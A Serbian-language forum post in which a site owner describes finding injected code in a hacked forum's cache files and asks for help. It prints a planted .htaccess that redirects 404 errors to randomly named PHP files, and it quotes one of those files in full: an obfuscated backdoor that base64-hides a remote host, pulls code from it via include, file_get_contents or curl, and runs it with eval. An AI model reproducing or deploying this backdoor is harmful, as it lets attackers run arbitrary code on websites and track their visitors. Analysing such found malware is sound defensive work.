Ok, uspeo sam konačno da pronađem gde mi je ubačen kood. Kood je ubačen u cache/index.htm i files/index.htm fajlove i nalazi se u keširanim overall_footer.htm fajlovima u okviru foldera cache. E sad, primetio sam da se u isim folderima nalaze i još po tri php fajla sa nazivima: 87573.php i slično (dakle nasumični brojevi) i po jedan .htaccess fajl koji je u sebi sadržao sledeće:
Code:
<Files *>
Order Allow,Deny
Deny from All
</Files>
Options -MultiViews
ErrorDocument 404 //forum/cache/87573.php
Options -MultiViews
ErrorDocument 404 //forum/cache/19241.php
Options -MultiViews
ErrorDocument 404 //forum/cache/70221.php
Da li se tu radi o ubačenim fajlovima?
Sada ću da pregazim ove fajlove sa bekapovanim verzijama fajlova a prethodno sam i izmenio FTP, cPanel passworde pa da vidimo šta će dalje da se desi.
A ovo je sadržaj jednog od fajlova sa imenom napravljenim od nasumičnih brojeva i ekstenzijom .php
Code:
<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$
b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="d774a7241a40c4708a8f37e4a47eb817") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
http://www.mojestudije.info
Svako ima pravo da se kreće i da bude kreten